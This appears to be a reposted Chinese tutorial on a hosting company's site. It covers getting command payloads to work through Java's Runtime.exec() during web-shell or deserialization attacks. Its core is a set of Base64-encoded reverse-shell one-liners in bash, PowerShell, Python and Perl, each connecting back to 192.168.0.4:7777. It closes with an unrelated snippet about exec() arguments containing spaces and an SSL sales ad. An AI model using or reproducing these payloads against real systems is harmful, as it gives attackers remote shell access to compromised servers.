小編給大家分享一下java.lang.Runtime.exec() Payload知識(shí)點(diǎn)的示例分析，希望大家閱讀完這篇文章之后都有所收獲，下面讓我們一起去探討吧！

無(wú)錫ssl適用于網(wǎng)站、小程序/APP、API接口等需要進(jìn)行數(shù)據(jù)傳輸應(yīng)用場(chǎng)景，ssl證書(shū)未來(lái)市場(chǎng)廣闊！成為成都創(chuàng)新互聯(lián)的ssl證書(shū)銷售渠道，可以享受市場(chǎng)價(jià)格4-6折優(yōu)惠！如果有意向歡迎電話聯(lián)系或者加微信：13518219792（備注：SSL證書(shū)合作）期待與您的合作！

有時(shí)，通過(guò)Runtime.getRuntime().exec()執(zhí)行命令的有效負(fù)載有時(shí)會(huì)失敗。使用Web Shell，反序列化利用或通過(guò)其他媒介時(shí)，可能會(huì)發(fā)生這種情況。

有時(shí)這是因?yàn)橹囟ㄏ蚝凸艿雷址氖褂迷趩?dòng)過(guò)程的上下文中沒(méi)有意義。例如，在shell中執(zhí)行l(wèi)s> dir_listing會(huì)將當(dāng)前目錄的列表輸出到名為dir_listing的文件中。但是在exec()函數(shù)的上下文中，該命令將被解釋為獲取>和dir_listing目錄的列表。

有時(shí)，StringTokenizer類會(huì)破壞其中包含空格的參數(shù)，該類將命令字符串按空格分隔。像ls“我的目錄”之類的東西將被解釋為ls“我的目錄”。

借助Base64編碼，下面的轉(zhuǎn)換器可以幫助減少這些問(wèn)題。它可以通過(guò)調(diào)用Bash或PowerShell來(lái)制作管道并重新定向，還可以確保參數(shù)內(nèi)沒(méi)有空格。

樣例：

bash -i >& /dev/tcp/192.168.0.4/7777 0>&1

編碼后：

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}
#bash

powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YgBhAHMAaAAgAC0AaQAgAD4AJgAgAC8AZABlAHYALwB0AGMAcAAvADEAOQAyAC4AMQA2ADgALgAwAC4ANAAvADcANwA3ADcAIAAwAD4AJgAxAA==
#powershell

python -c exec('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='.decode('base64'))
#python

perl -MMIME::Base64 -e eval(decode_base64('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='))
#perl

中間的字符均為“base64”編碼。

知識(shí)點(diǎn)擴(kuò)展：

java.lang.Runtime.getRuntime().exec(cmd)命令中參數(shù)不能用空格怎么辦？

項(xiàng)目中無(wú)法執(zhí)行c程序，猜測(cè)是exec()函數(shù)的問(wèn)題

String cmd= exe_path + " " +video + " " +host + ":" + port;
Process process = runtime.exec(cmd);

看完了這篇文章，相信你對(duì)“java.lang.Runtime.exec() Payload知識(shí)點(diǎn)的示例分析”有了一定的了解，如果想了解更多相關(guān)知識(shí)，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝各位的閱讀！

當(dāng)前文章：java.lang.Runtime.exec()Payload知識(shí)點(diǎn)的示例分析
地址分享：http://chinadenli.net/article18/gdoigp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供電子商務(wù)、、營(yíng)銷型網(wǎng)站建設(shè)、全網(wǎng)營(yíng)銷推廣、做網(wǎng)站、動(dòng)態(tài)網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)